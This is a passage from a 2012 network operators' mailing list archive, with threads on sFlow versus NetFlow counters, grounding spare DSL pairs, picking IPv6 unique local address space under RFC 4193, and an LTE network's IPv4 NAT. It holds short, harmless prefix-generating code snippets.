measuring the voltage and resistance may be non-trivial :) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From nick at foobar.org Tue Jul 17 11:37:44 2012 From: nick at foobar.org (Nick Hilliard) Date: Tue, 17 Jul 2012 17:37:44 +0100 Subject: Real world sflow vs netflow? In-Reply-To: References: <50012E21.4060802@bromirski.net> <50032DA2.9020108@foobar.org> Message-ID: <500594D8.9000400@foobar.org> On 17/07/2012 16:32, Simon Leinen wrote: > That's one reason, but another reason would be that at least in Netflow > (but sFlow may be similar depending on how you use it), the reported > byte counts only include the sizes of the "L3" packets, i.e. starting at > the IP header, while the SNMP interface counters (ifInOctets etc.) > include L2 overhead such as Ethernet frame headers and such. sflow includes both figures. Nick From olipro at 8.c.9.b.0.7.4.0.1.0.0.2.ip6.arpa Tue Jul 17 11:49:16 2012 From: olipro at 8.c.9.b.0.7.4.0.1.0.0.2.ip6.arpa (Oliver) Date: Tue, 17 Jul 2012 18:49:16 +0200 Subject: using "reserved" IPv6 space In-Reply-To: References: <2059648.BTFFAkdkz4@lsdsrv> Message-ID: <1405884.4ZNo3jpiVl@lsdsrv> On Monday 16 July 2012 21:11:18 you wrote: > The disadvantage to this is the high probability of packet duplication. For > someone worried about ICMP spam on the subnet, I'm surprised you're not > worried about what happens when 2 or more routers copy the same packet > and route both copies on to the end destination. (Lather, rinse, repeat said > duplication for any upstream segments using such tactics as well). > No. The all-routers anycast address is resolved and creates a single Layer 2 neighbor entry - it may change, but there's no packet duplication issue here because routing of an individual packet will only ever go to a single host at L2, There is a difference between Multicast and Anycast. Regards, Oliver From peter.phaal at gmail.com Tue Jul 17 12:16:11 2012 From: peter.phaal at gmail.com (Peter Phaal) Date: Tue, 17 Jul 2012 10:16:11 -0700 Subject: Real world sflow vs netflow? In-Reply-To: References: <50012E21.4060802@bromirski.net> <50032DA2.9020108@foobar.org> Message-ID: In the case of sFlow, the collector determines how to report bytes. The sFlow agent reports the size of the sampled layer 2 frame (along with the first 128 bytes of the frame) and the collector can choose whether to report L2 bytes, L3 bytes, L4 bytes etc. by subtracting the sizes of the headers. It seems likely that the sFlow collector used in the tests was reporting L3 bytes since the numbers were in agreement with the numbers reported by NetFlow. Peter On Tue, Jul 17, 2012 at 8:32 AM, Simon Leinen wrote: > James Braunegg writes: >> That being said both netflow and sflow both under read by about 3% >> when compared to snmp port counters, which we put to the conclusion >> was broadcast traffic etc which the routers didn't see / flow. > > That's one reason, but another reason would be that at least in Netflow > (but sFlow may be similar depending on how you use it), the reported > byte counts only include the sizes of the "L3" packets, i.e. starting at > the IP header, while the SNMP interface counters (ifInOctets etc.) > include L2 overhead such as Ethernet frame headers and such. > -- > Simon. > From MatlockK at exempla.org Tue Jul 17 12:16:07 2012 From: MatlockK at exempla.org (Matlock, Kenneth L) Date: Tue, 17 Jul 2012 11:16:07 -0600 Subject: Managing free pairs to prevent DSL sync. loss In-Reply-To: <79774.1342539500@turing-police.cc.vt.edu> References: <011601cd6426$b35fb060$1a1f1120$@sstar.com> <24359.1342537189@turing-police.cc.vt.edu> <4288131ED5E3024C9CD4782CECCAD2C716AD0D9C@LMC-MAIL2.exempla.org> <015701cd642f$1f9bd800$5ed38800$@sstar.com> <79774.1342539500@turing-police.cc.vt.edu> Message-ID: <4288131ED5E3024C9CD4782CECCAD2C716AD0D9D@LMC-MAIL2.exempla.org> -----Original Message----- From: valdis.kletnieks at vt.edu [mailto:valdis.kletnieks at vt.edu] > No, it will be strictly a DC current, with the amperage easily calculated from the voltage difference between the two ends and the resistance of > however many cable-feet of wire is involved. Not usually a big deal, unless your termination design didn't include the ability to sink a DC current > 24/7. > (Of course, actually measuring the voltage and resistance may be non-trivial :) That brings up an interesting question. I assumed the ground potential stays the same between 2 points, but have there been any studies to see if it's actually DC, or if there's an AC component to it? If there's an AC component in the ground at either end (or both) that may introduce EM into adjacent pairs across the cable. And are they more or less than the EM ungrounded pairs would pick up? Ken Matlock Network Analyst 303-467-4671 matlockk at exempla.org *** SCLHS Confidentiality Notice *** The information contained in this message may be privileged and confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any other dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify me immediately by replying to the message and deleting it from your computer. Thank you. *** SCLHS Confidentiality Notice *** From dougb at dougbarton.us Tue Jul 17 12:43:07 2012 From: dougb at dougbarton.us (Doug Barton) Date: Tue, 17 Jul 2012 10:43:07 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <1342509300.6281.198.camel@karl> References: <2059648.BTFFAkdkz4@lsdsrv> <4742592599634568524@unknownmsgid> <1342500058.6281.154.camel@karl> <894EB7FC-A18C-41BA-A778-85564632FC8E@delong.com> <1342509300.6281.198.camel@karl> Message-ID: <5005A42B.1020606@dougbarton.us> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 On 7/17/2012 12:15 AM, Karl Auer wrote: > But I do not have an encylopaedic knowledge of all the RFCs, so > perhaps this has been superseded, obsoleted or updated... This gets a lot easier if you use the tools site: https://tools.ietf.org/html/rfc4291 - -- If you're never wrong, you're not trying hard enough -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.17 (MingW32) iQEcBAEBCAAGBQJQBaQrAAoJEFzGhvEaGryEJ/0H/jB6EpjYE9XMvT0twx0VGql9 K9uAfF62rnQ8bnN3upVo12EcvMuhJkNIl4YNUMc1rNajHGcXzEUtEVb3Uz/2RFgy hxrgzjCi8mc8ykkacCE5aLwckNvw3UvViTijLs4mao1Eks885TnVXEjj6hgL/PNy pgXNoU43bmYiFv2IvL2o+16q3Y/PzWJYGBt6+EfbtfcTbX3W/TfqUNMEyAxpz0PC DDhMLM6Z8RZWD9BKbs4Qe5Z+4gOeu32fuxZ+5Au1Lxw9w4Z41cR4mEil697tQwUL Pg1QDHAAce7NKOuRzInotIG8iwWcQEjYxNo+MKQZFUUUSJJoID3BzvwQkYdr6Lc= =IX7u -----END PGP SIGNATURE----- From mikea at mikea.ath.cx Tue Jul 17 12:45:35 2012 From: mikea at mikea.ath.cx (Mike Andrews) Date: Tue, 17 Jul 2012 12:45:35 -0500 Subject: Managing free pairs to prevent DSL sync. loss In-Reply-To: <4288131ED5E3024C9CD4782CECCAD2C716AD0D9D@LMC-MAIL2.exempla.org> References: <011601cd6426$b35fb060$1a1f1120$@sstar.com> <24359.1342537189@turing-police.cc.vt.edu> <4288131ED5E3024C9CD4782CECCAD2C716AD0D9C@LMC-MAIL2.exempla.org> <015701cd642f$1f9bd800$5ed38800$@sstar.com> <79774.1342539500@turing-police.cc.vt.edu> <4288131ED5E3024C9CD4782CECCAD2C716AD0D9D@LMC-MAIL2.exempla.org> Message-ID: <20120717174535.GA71915@mikea.ath.cx> On Tue, Jul 17, 2012 at 11:16:07AM -0600, Matlock, Kenneth L wrote: > That brings up an interesting question. I assumed the ground potential > stays the same between 2 points, but have there been any studies to see > if it's actually DC, or if there's an AC component to it? Thaat's not a safe assumption, since most power companies use earth grounds for their distribution systems. That means that potential between two points, and the current through the ground between those two points, may vary depending on what's happening in the electrically-near parts of the power distribution system. That's not a happy thought, but it is Real Life. It's one of the reasons we went to fiber between widely-separated buildings in our field sites. In my experience, there are AC and DC components both. They're generally -- but not always -- negligible, unless something goes wrong or one end of the line takes a lightning strike, in which case "ground" can rise to bunchty KV. > If there's an AC component in the ground at either end (or both) that > may introduce EM into adjacent pairs across the cable. And are they more > or less than the EM ungrounded pairs would pick up? Whatever is picked up by ungrounded pairs should be common-mode -- the same on both wires in the pair. Even if it is induced into the "live" pairs in the bundle, it shouldn't affect signalling. In theory, that is. -- Mike Andrews, W5EGO mikea at mikea.ath.cx Tired old sysadmin From dougb at dougbarton.us Tue Jul 17 12:49:27 2012 From: dougb at dougbarton.us (Doug Barton) Date: Tue, 17 Jul 2012 10:49:27 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <20120717124713.GA10157@pob.ytti.fi> References: <86a9z1hjzy.fsf@seastrom.com> <50042F34.5080007@gmail.com> <50055A41.2020005@gmail.com> <20120717124713.GA10157@pob.ytti.fi> Message-ID: <5005A5A7.8020706@dougbarton.us> On 7/17/2012 5:47 AM, Saku Ytti wrote: > I wonder who really believes there is no usage case for NAT66. Have these > people seen non-trivial corporate networks? > > I'm sure many people in this list finance part of their lives with renumber > projects costing MUSDs. For many companies just finding out where addresses > have been punched in (your FWs, your software, partner FWs, partner > software, configurations...) will take months, before even starting > renumbering. For those with PA space https://tools.ietf.org/html/rfc6144 should be a good solution. Doug -- If you're never wrong, you're not trying hard enough From johns at sstar.com Tue Jul 17 14:27:01 2012 From: johns at sstar.com (John Souvestre) Date: Tue, 17 Jul 2012 14:27:01 -0500 Subject: Managing free pairs to prevent DSL sync. loss In-Reply-To: <20120717174535.GA71915@mikea.ath.cx> References: <011601cd6426$b35fb060$1a1f1120$@sstar.com> <24359.1342537189@turing-police.cc.vt.edu> <4288131ED5E3024C9CD4782CECCAD2C716AD0D9C@LMC-MAIL2.exempla.org> <015701cd642f$1f9bd800$5ed38800$@sstar.com> <79774.1342539500@turing-police.cc.vt.edu> <4288131ED5E3024C9CD4782CECCAD2C716AD0D9D@LMC-MAIL2.exempla.org> <20120717174535.GA71915@mikea.ath.cx> Message-ID: <001c01cd6452$251c7410$6f555c30$@sstar.com> You could "ground" then via some small capacitors. This would block DC and the low frequency power line trash and even act somewhat as a fuse should there be a lightning strike. John ??? John Souvestre - New Orleans LA - (504) 454-0899 -----Original Message----- From: Mike Andrews [mailto:mikea at mikea.ath.cx] Sent: Tuesday, July 17, 2012 12:46 pm To: NANOG Mailing List Subject: Re: Managing free pairs to prevent DSL sync. loss On Tue, Jul 17, 2012 at 11:16:07AM -0600, Matlock, Kenneth L wrote: > That brings up an interesting question. I assumed the ground potential > stays the same between 2 points, but have there been any studies to > see if it's actually DC, or if there's an AC component to it? Thaat's not a safe assumption, since most power companies use earth grounds for their distribution systems. That means that potential between two points, and the current through the ground between those two points, may vary depending on what's happening in the electrically-near parts of the power distribution system. That's not a happy thought, but it is Real Life. It's one of the reasons we went to fiber between widely-separated buildings in our field sites. In my experience, there are AC and DC components both. They're generally -- but not always -- negligible, unless something goes wrong or one end of the line takes a lightning strike, in which case "ground" can rise to bunchty KV. > If there's an AC component in the ground at either end (or both) that > may introduce EM into adjacent pairs across the cable. And are they > more or less than the EM ungrounded pairs would pick up? Whatever is picked up by ungrounded pairs should be common-mode -- the same on both wires in the pair. Even if it is induced into the "live" pairs in the bundle, it shouldn't affect signalling. In theory, that is. -- Mike Andrews, W5EGO mikea at mikea.ath.cx Tired old sysadmin From sethm at rollernet.us Tue Jul 17 17:21:22 2012 From: sethm at rollernet.us (Seth Mattinen) Date: Tue, 17 Jul 2012 15:21:22 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <500032E4.40804@gmail.com> References: <500032E4.40804@gmail.com> Message-ID: <5005E562.8060206@rollernet.us> On 7/13/12 7:38 AM, -Hammer- wrote: > OK. I'm pretty sure I'm gonna get some flak for this but I'll share this > question and it's background anyway. Please be gentle. > > In the past, with IPv4, we have used reserved or "non-routable" space > Internally in production for segments that won't be seen anywhere else. > Examples? A sync VLAN for some FWs to share state. An IBGP link between > routers that will never be seen or advertised. In those cases, we have > often used 192.0.2.0/24. It's reserved and never used and even if it did > get used one day we aren't "routing" it internally. It's just on > segments where we need some L3 that will never be seen. > > On to IPv6 > > I was considering taking the same approach. Maybe using 0100::/8 or > 1000::/4 or A000::/3 as a space for this. > > Other than the usual "Hey, you shouldn't do that" can anyone give me > some IPv6 specific reasons that I may not be forecasting that would make > it worse doing this than in an IPv4 scenario. I know, not apples to > apples but for this question they are close enough. Unless there is > something IPv6 specific that is influencing this.... > Don't, because there's already a /10 defined for such things. It's called ULA (unique local address) aka RFC 4193. ULAs are not globally routable. Here's a calculator that will generate a random one for you: http://bitace.com/ipv6calc/ ~Seth From jeroen at unfix.org Tue Jul 17 17:34:37 2012 From: jeroen at unfix.org (Jeroen Massar) Date: Wed, 18 Jul 2012 00:34:37 +0200 Subject: using "reserved" IPv6 space In-Reply-To: <5005E562.8060206@rollernet.us> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> Message-ID: <5005E87D.6060006@unfix.org> On 2012-07-18 00:21, Seth Mattinen wrote: [..] > Don't, because there's already a /10 defined for such things. It's > called ULA (unique local address) aka RFC 4193. ULAs are not globally > routable. > > Here's a calculator that will generate a random one for you: > > http://bitace.com/ipv6calc/ A random one indeed, because the javascript for it is just: 8<----------------------------------------------------- var calc_private = function() { var str = "fd"; for(i = 0; i<10; i++) { str = str + toHex(Math.floor(Math.random()*16)); if (i % 4 == 1) str = str + ":"; } $("#private_subnet").html("Your private subnet is: "+str+":/48"); $("#multicast1").val(str+":/48"); calc_multicast1(); ------------------------------------------------------->8 does not follow RFC4193 in any way at all. A such do not use it. The original real RFC4193 ULA generator script can be found at: http://www.kame.net/~suz/gen-ula.html google(ipv6 ula) for another page, that has been referenced often enough on this very list already, if you want to 'register' it there to avoid another small chance of collision, that page also uses the script from the above site for a true RFC4193 prefix. Greets, Jeroen From sethm at rollernet.us Tue Jul 17 17:47:01 2012 From: sethm at rollernet.us (Seth Mattinen) Date: Tue, 17 Jul 2012 15:47:01 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <5005E87D.6060006@unfix.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> Message-ID: <5005EB65.90608@rollernet.us> On 7/17/12 3:34 PM, Jeroen Massar wrote: > On 2012-07-18 00:21, Seth Mattinen wrote: > [..] >> Don't, because there's already a /10 defined for such things. It's >> called ULA (unique local address) aka RFC 4193. ULAs are not globally >> routable. >> >> Here's a calculator that will generate a random one for you: >> >> http://bitace.com/ipv6calc/ > > A random one indeed, because the javascript for it is just: > 8<----------------------------------------------------- > var calc_private = function() { > > var str = "fd"; > > for(i = 0; i<10; i++) { > str = str + toHex(Math.floor(Math.random()*16)); > if (i % 4 == 1) str = str + ":"; > } > > $("#private_subnet").html("Your private subnet is: > "+str+":/48"); > $("#multicast1").val(str+":/48"); > calc_multicast1(); > ------------------------------------------------------->8 > > does not follow RFC4193 in any way at all. A such do not use it. > > The original real RFC4193 ULA generator script can be found at: > http://www.kame.net/~suz/gen-ula.html > > google(ipv6 ula) for another page, that has been referenced often enough > on this very list already, if you want to 'register' it there to avoid > another small chance of collision, that page also uses the script from > the above site for a true RFC4193 prefix. > Oh well, so much for the googles. Still, don't make up your own squat range for "private" IPv6 space. Use ULA if you really want such a thing. ~Seth From jeroen at unfix.org Tue Jul 17 17:57:27 2012 From: jeroen at unfix.org (Jeroen Massar) Date: Wed, 18 Jul 2012 00:57:27 +0200 Subject: using "reserved" IPv6 space In-Reply-To: <5005EB65.90608@rollernet.us> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <5005EB65.90608@rollernet.us> Message-ID: <5005EDD7.1040304@unfix.org> On 2012-07-18 00:47, Seth Mattinen wrote: [..] >>> Here's a calculator that will generate a random one for you: >>> >>> http://bitace.com/ipv6calc/ >> >> A random one indeed, because the javascript for it is just: [..] >> does not follow RFC4193 in any way at all. A such do not use it. >> >> The original real RFC4193 ULA generator script can be found at: >> http://www.kame.net/~suz/gen-ula.html >> >> google(ipv6 ula) for another page, that has been referenced often enough >> on this very list already, if you want to 'register' it there to avoid >> another small chance of collision, that page also uses the script from >> the above site for a true RFC4193 prefix. >> > > > Oh well, so much for the googles. Yes, it is a shame that the bitace thing references RFC4193 and then does not use it. Lets Bcc: them and see if they act upon, you never know if they fix things or not, there are good guys still left on these Internets. > Still, don't make up your own squat > range for "private" IPv6 space. Use ULA if you really want such a thing. I am wondering what you meaning with 'squat', note that what I reference above is real full RFC4193 calculated ULA. The optional registration thingy is just optional for those that don't trust probability and want to have a little more security. Also lots of folks like to claim something as their own and well storage bits are cheap for that little amount of info and reassures a lot of folks. Greets, Jeroen From jeroen at unfix.org Tue Jul 17 17:59:41 2012 From: jeroen at unfix.org (Jeroen Massar) Date: Wed, 18 Jul 2012 00:59:41 +0200 Subject: using "reserved" IPv6 space In-Reply-To: <5005EDD7.1040304@unfix.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <5005EB65.90608@rollernet.us> <5005EDD7.1040304@unfix.org> Message-ID: <5005EE5D.4050504@unfix.org> On 2012-07-18 00:57, Jeroen Massar wrote: > On 2012-07-18 00:47, Seth Mattinen wrote: > [..] >>>> Here's a calculator that will generate a random one for you: >>>> >>>> http://bitace.com/ipv6calc/ [..] > Yes, it is a shame that the bitace thing references RFC4193 and then > does not use it. Lets Bcc: them and see if they act upon, you never know > if they fix things or not, there are good guys still left on these > Internets. So much for gmail never fails: : host aspmx.l.google.com[173.194.70.26] said: 550-5.1.1 The email account that you tried to reach does not exist. Please try 550-5.1.1 double-checking the recipient's email address for typos or 550-5.1.1 unnecessary spaces. Learn more at 550 5.1.1 http://support.google.com/mail/bin/answer.py?answer=6596 p20si34103229wiv.37 (in reply to RCPT TO command) If anybody does have a contact @bitace.com don't hesitate to forward them this discussion. Now also bcc'd to the contact in whois for the domain. Greets, Jeroen From sethm at rollernet.us Tue Jul 17 18:36:54 2012 From: sethm at rollernet.us (Seth Mattinen) Date: Tue, 17 Jul 2012 16:36:54 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <5005EDD7.1040304@unfix.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <5005EB65.90608@rollernet.us> <5005EDD7.1040304@unfix.org> Message-ID: <5005F716.4060708@rollernet.us> On 7/17/12 3:57 PM, Jeroen Massar wrote: > > I am wondering what you meaning with 'squat', note that what I reference > above is real full RFC4193 calculated ULA. > By "squat" I meant take a random chunk of IPv6 space and use it as "private" address space. He said: On 7/13/12 7:38 AM, -Hammer- wrote: > I was considering taking the same approach. Maybe using 0100::/8 or > 1000::/4 or A000::/3 as a space for this. And I would say no, use ULA space instead since it's set aside for such things. ~Seth From bross at pobox.com Tue Jul 17 18:46:39 2012 From: bross at pobox.com (Brandon Ross) Date: Tue, 17 Jul 2012 19:46:39 -0400 (EDT) Subject: Adtran NetVanta deployment experience Message-ID: I'd like to speak to someone who's had deployment experience around the Adtran NetVanta product line that has used it's firewalling and/or VPN functionality. Feel free to reply off-list. I'm trying to get an idea of real-world performance expectations. -- Brandon Ross Yahoo & AIM: BrandonNRoss +1-404-635-6667 ICQ: 2269442 Schedule a meeting: https://tungle.me/bross Skype: brandonross From cb.list6 at gmail.com Tue Jul 17 18:53:57 2012 From: cb.list6 at gmail.com (Cameron Byrne) Date: Tue, 17 Jul 2012 16:53:57 -0700 Subject: Another LTE network turns up as IPv4-only squat space + NAT Message-ID: FYI http://www.dslreports.com/forum/r27324698-LTE-access-early- So much for next generation technology ... CB From marka at isc.org Tue Jul 17 19:15:17 2012 From: marka at isc.org (Mark Andrews) Date: Wed, 18 Jul 2012 10:15:17 +1000 Subject: using "reserved" IPv6 space In-Reply-To: Your message of "Wed, 18 Jul 2012 00:34:37 +0200." <5005E87D.6060006@unfix.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> Message-ID: <20120718001518.602A4229D042@drugs.dv.isc.org> In message <5005E87D.6060006 at unfix.org>, Jeroen Massar writes: > On 2012-07-18 00:21, Seth Mattinen wrote: > [..] > > Don't, because there's already a /10 defined for such things. It's > > called ULA (unique local address) aka RFC 4193. ULAs are not globally > > routable. > > > > Here's a calculator that will generate a random one for you: > > > > http://bitace.com/ipv6calc/ > > A random one indeed, because the javascript for it is just: > 8<----------------------------------------------------- > var calc_private = function() { > > var str = "fd"; > > for(i = 0; i<10; i++) { > str = str + toHex(Math.floor(Math.random()*16)); > if (i % 4 == 1) str = str + ":"; > } > > $("#private_subnet").html("Your private subnet is: > "+str+":/48"); > $("#multicast1").val(str+":/48"); > calc_multicast1(); > ------------------------------------------------------->8 > > does not follow RFC4193 in any way at all. A such do not use it. If you have a true random number source you don't need to use the method in RFC4193. The method in RFC4193 is designed to get produce a good enough pseudo source of randomness. > The original real RFC4193 ULA generator script can be found at: > http://www.kame.net/~suz/gen-ula.html > > google(ipv6 ula) for another page, that has been referenced often enough > on this very list already, if you want to 'register' it there to avoid > another small chance of collision, that page also uses the script from > the above site for a true RFC4193 prefix. > > Greets, > Jeroen > -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From trejrco at gmail.com Tue Jul 17 19:40:07 2012 From: trejrco at gmail.com (TJ) Date: Tue, 17 Jul 2012 20:40:07 -0400 Subject: Another LTE network turns up as IPv4-only squat space + NAT In-Reply-To: References: Message-ID: On Jul 17, 2012 7:54 PM, "Cameron Byrne" wrote: > > FYI http://www.dslreports.com/forum/r27324698-LTE-access-early- > > So much for next generation technology ... No IPv6, and using duplicate IPv4 space. #sigh #fail /TJ From streiner at cluebyfour.org Tue Jul 17 23:24:36 2012 From: streiner at cluebyfour.org (Justin M. Streiner) Date: Wed, 18 Jul 2012 00:24:36 -0400 (EDT) Subject: Another LTE network turns up as IPv4-only squat space + NAT In-Reply-To: References: Message-ID: On Tue, 17 Jul 2012, Cameron Byrne wrote: > FYI http://www.dslreports.com/forum/r27324698-LTE-access-early- Short-sighted and foolish. Shame on you, Sprint. jms From saku at ytti.fi Wed Jul 18 02:04:05 2012 From: saku at ytti.fi (Saku Ytti) Date: Wed, 18 Jul 2012 10:04:05 +0300 Subject: using "reserved" IPv6 space In-Reply-To: <5005E87D.6060006@unfix.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> Message-ID: <20120718070405.GA10591@pob.ytti.fi> On (2012-07-18 00:34 +0200), Jeroen Massar wrote: > > Here's a calculator that will generate a random one for you: > > does not follow RFC4193 in any way at all. A such do not use it. Another silly oneliner, not RFC4193. ruby -e'p ("fd"+rand(2**40).to_s(16)).scan(/.{1,4}/).join(":")+"::/48"' I'm not sure if RFC4193 is best way to generate random part, it should be possible to incorporate RFC2777 verifiability to it. It would allow operators to prove people who got memorable addresses were not favoured and it would allow the people who generated them to prove they used accepted methods to generate them. However I'm not sure what would be good seed? ISO3166 alpha2 + domestic_business_id + 0..n (for nth block you needed) In practice I'm sure we'll notice bias in random numbers towards 0. As many people who've not been through painful enough M&A renumbers will opt for memorable addresses. -- ++ytti From valdis.kletnieks at vt.edu Wed Jul 18 08:10:33 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Wed, 18 Jul 2012 09:10:33 -0400 Subject: using "reserved" IPv6 space In-Reply-To: Your message of "Wed, 18 Jul 2012 10:04:05 +0300." <20120718070405.GA10591@pob.ytti.fi> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> Message-ID: <34110.1342617033@turing-police.cc.vt.edu> On Wed, 18 Jul 2012 10:04:05 +0300, Saku Ytti said: > However I'm not sure what would be good seed? ISO3166 alpha2 + > domestic_business_id + 0..n (for nth block you needed) You want to roll in at some entropy by adding in the current date or something, so two "Joes' Burritos and Internet" in 2 different states don't generate the same value. There's a reason that 4193 recommends a 64bit timestamp and an EUI64. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From saku at ytti.fi Wed Jul 18 08:25:02 2012 From: saku at ytti.fi (Saku Ytti) Date: Wed, 18 Jul 2012 16:25:02 +0300 Subject: using "reserved" IPv6 space In-Reply-To: <34110.1342617033@turing-police.cc.vt.edu> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <34110.1342617033@turing-police.cc.vt.edu> Message-ID: <20120718132502.GA11293@pob.ytti.fi> On (2012-07-18 09:10 -0400), valdis.kletnieks at vt.edu wrote: > You want to roll in at some entropy by adding in the current date or > something, so two "Joes' Burritos and Internet" in 2 different states don't > generate the same value. There's a reason that 4193 recommends > a 64bit timestamp and an EUI64. I assume business ids are federal not state, as IRS is federal? Anyhow I'm not saying 'this is how it should be done', I'm saying maybe there is way to do this in a way which is verifiably random. 64b timestamp and EUI64 make it non-verifiable. I think it would be nice, that people who play by the rules are able to prove they did. Otherwise you can generate it any way you want and claim you did it the right way. -- ++ytti From stephen at sprunk.org Wed Jul 18 08:37:08 2012 From: stephen at sprunk.org (Stephen Sprunk) Date: Wed, 18 Jul 2012 08:37:08 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <20120718070405.GA10591@pob.ytti.fi> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> Message-ID: <5006BC04.1000306@sprunk.org> On 18-Jul-12 02:04, Saku Ytti wrote: > On (2012-07-18 00:34 +0200), Jeroen Massar wrote: >>> Here's a calculator that will generate a random one for you: >> does not follow RFC4193 in any way at all. A such do not use it. > I'm not sure if RFC4193 is best way to generate random part, It's not claimed to be the "best" way, just one of many possible good ways. If you can demonstrate that your way is at least as good, go for it. > it should bepossible to incorporate RFC2777 verifiability to it. There is no need for that, since your failure to use a good source of randomness hurts nobody except yourself. If you're too lazy to come up with a good method yourself, as most people are, there are several online RFC 4193-compliant prefix generators that will save you the effort. At least one even includes the ability to record your results and be assured (within the margin of best-effort service) that you will not collide with anyone else who does so. S -- Stephen Sprunk "God does not play dice." --Albert Einstein CCIE #3723 "God is an inveterate gambler, and He throws the K5SSS dice at every possible opportunity." --Stephen Hawking -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2312 bytes Desc: S/MIME Cryptographic Signature URL: From stephen at sprunk.org Wed Jul 18 08:47:57 2012 From: stephen at sprunk.org (Stephen Sprunk) Date: Wed, 18 Jul 2012 08:47:57 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <20120718132502.GA11293@pob.ytti.fi> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <34110.1342617033@turing-police.cc.vt.edu> <20120718132502.GA11293@pob.ytti.fi> Message-ID: <5006BE8D.5080705@sprunk.org> On 18-Jul-12 08:25, Saku Ytti wrote: > On (2012-07-18 09:10 -0400), valdis.kletnieks at vt.edu wrote: >> You want to roll in at some entropy by adding in the current date or something, so two "Joes' Burritos and Internet" in 2 different states don't generate the same value. There's a reason that 4193 recommends a 64bit timestamp and an EUI64. > I assume business ids are federal not state, as IRS is federal? Anyhow I'm not saying 'this is how it should be done', I'm saying maybe there is way to do this in a way which is verifiably random. US EINs/SSNs, and various state-level ID numbers, are not random; given our problems with identity theft, they're not guaranteed to be unique, either. I assume the same is true for identification numbers in most other countries. > 64b timestamp and EUI64 make it non-verifiable. If you publish the numbers you used, then others can verify that those values are reasonable. I doubt anyone would sift through billions of reasonable timestamps combined with the thousands of EUI64s at their site just to find a result that was "memorable". And, if they did, who cares? It's not like it hurts me for them to do so--unless I'm dumb enough to do the same thing, happened to get the same result /and/ happened to merge with them--all of which are still unlikely events. S -- Stephen Sprunk "God does not play dice." --Albert Einstein CCIE #3723 "God is an inveterate gambler, and He throws the K5SSS dice at every possible opportunity." --Stephen Hawking -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2312 bytes Desc: S/MIME Cryptographic Signature URL: From saku at ytti.fi Wed Jul 18 08:48:00 2012 From: saku at ytti.fi (Saku Ytti) Date: Wed, 18 Jul 2012 16:48:00 +0300 Subject: using "reserved" IPv6 space In-Reply-To: <5006BC04.1000306@sprunk.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> Message-ID: <20120718134800.GA11320@pob.ytti.fi> On (2012-07-18 08:37 -0500), Stephen Sprunk wrote: > > it should bepossible to incorporate RFC2777 verifiability to it. > > There is no need for that, since your failure to use a good source of > randomness hurts nobody except yourself. I think you're making fact out of opinion. Maybe SP is generating ULAs for their customers. Maybe they'd like to be able to prove in case of dispute that other customer with memorable ULA was not favoured. Maybe someone claims I'm not using BCP methods for ULA selection, and I'd like to be able to falsify those claims. Obviously I could come up with some own RRFC2777 style algo to generate ULA, but if it would be internally documented it would hardly be provable, as I couldn't prove I haven't come up with the algo after generating the prefix. Maybe this is not practical enough concern, but I'm wondering, what is the downside? What is the benefit of recommending method which is not testable/provable. -- ++ytti From saku at ytti.fi Wed Jul 18 09:00:59 2012 From: saku at ytti.fi (Saku Ytti) Date: Wed, 18 Jul 2012 17:00:59 +0300 Subject: using "reserved" IPv6 space In-Reply-To: <5006BE8D.5080705@sprunk.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <34110.1342617033@turing-police.cc.vt.edu> <20120718132502.GA11293@pob.ytti.fi> <5006BE8D.5080705@sprunk.org> Message-ID: <20120718140059.GA11329@pob.ytti.fi> On (2012-07-18 08:47 -0500), Stephen Sprunk wrote: > And, if they did, who cares? It's not like it hurts me for them to do > so--unless I'm dumb enough to do the same thing, happened to get the > same result /and/ happened to merge with them--all of which are still > unlikely events. In which case, you could prove you did the right thing. I'm not disagreeing with you that benefits are marginal (I think most 'randomly' choose 0 anyhow). I'm asking, what would the recommend method lose by being verifiable? 